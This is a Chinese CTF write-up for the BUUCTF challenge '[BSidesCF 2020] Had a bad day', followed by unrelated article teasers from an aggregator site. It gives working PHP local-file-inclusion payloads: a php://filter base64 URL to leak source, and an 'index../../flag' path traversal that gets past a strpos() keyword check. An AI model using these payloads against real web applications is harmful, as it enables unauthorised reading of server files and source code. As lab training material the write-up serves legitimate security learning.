BUUCTF_[BSidesCF 2020]Had a bad day

news/2024/9/22 21:09:50/

[BSidesCF 2020]Had a bad day

1.一看题目直接尝试文件包含
在这里插入图片描述

2.直接报错，确实是存在文件包含漏洞
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index

在这里插入图片描述

strpos() 函数查找字符串在另一字符串中第一次出现的位置（区分大小写）。
注释：strpos() 函数是区分大小写的。
注释：该函数是二进制安全的。

3.说明输入的参数必须含有woofers，meowers，index
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index…/…/flag

在这里插入图片描述

在这里插入图片描述
4.成功得到flag
flag{558a1dc9-78a9-41bc-9833-e3168ad731b2}

http://www.ppmy.cn/news/1445703.html

go语言并发实战——日志收集系统(十) 重构tailfile模块实现同时监控多个日志文件

前言在上一篇文章中，我们实现了通过etcd来同时指定多个不同的有关分区与日志文件的路径，但是锁着一次读取配置的增多，不可避免的出现了一个问题：我们如何来监控多个日志文件，这样原来的tailFile模块相对于当下场景就…

Django框架模板位置（默认自定义）

1、默认模板位置如果当前项目名称为learning_log 在该项目下，有一个应用，名称为learning_logs 那么Django默认的‘模板位置’是： .\learning_log\learning_logs\templates\learning_logs 2、自定义模板位置修改项目learning_log的sett…

【目标检测】Yolov7 的 ELAN 和 E-ELAN 模块演进（涉及到分组卷积，cardinality，梯度路径）

感觉从 YOLOv6 开始，YOLOv6 系列感觉优化点都着重于推理速度上面，YOLOv6 的 RepBlock 重参数化，给我的感觉就是算子融合进行加速。而 YOLOv7，为了在各种架构的边缘设备上获得极致的推理速度。 YOLOv7 的工作： 新的 b…

写一个函数，求两个整数之和，要求在函数体内不得使用＋、－、×、÷ 四则运算符号。

class Solution { public: int add(int num1, int num2){ int res 0; int Cin 0; int tmp 1; for(int i 0;i<32;i){ int a num1 & tmp;//取得num1和num2的第i位的值 int b num2 & tmp; …

SpringSecurity授权流程（自己做笔记用的）

目录一、RABC表的设计二、查询权限并添加Security中三、通过注解进行授权四、授权进行前端访问一、RABC表的设计基本概念就是五个表： 用户表：users 角色表：role 权限表：permission 还需要两种关系表，才能通过…

Python数组类+AI插件

目录规划实现初始化插入删除查找 AI插件单测注释调优建议小结规划先想清楚都写哪些，然后再动手操作用Python写了一个简单数组类，首先思考下都写哪些功能： 插入删除查找用插件做单元测试和写注释目的只是实现一个简单的数组类&#x…

移动应用安全

移动应用安全移动应用安全主要关注Android、iOS、Windows Phone等平台上移动应用软件安全状态。它涉及应用程序在其设计运行的平台上下文中的安全问题、它们使用的框架以及预期的用户集。所有主流的移动平台都提供大量可选的安全控制，旨在帮助软件开发人员构建安全…

GIT入门到实战

文章目录版本控制常见的版本控制工具版本控制分类Git与SVN的主要区别 Git基本理论（重要）三个区域工作流程 GIT文件操作文件的四种状态查看文件状态忽略文件 GIT 常见问题版本控制版本控制（Revision control）是一种在开发的过程…

BUUCTF_[BSidesCF 2020]Had a bad day

[BSidesCF 2020]Had a bad day

相关文章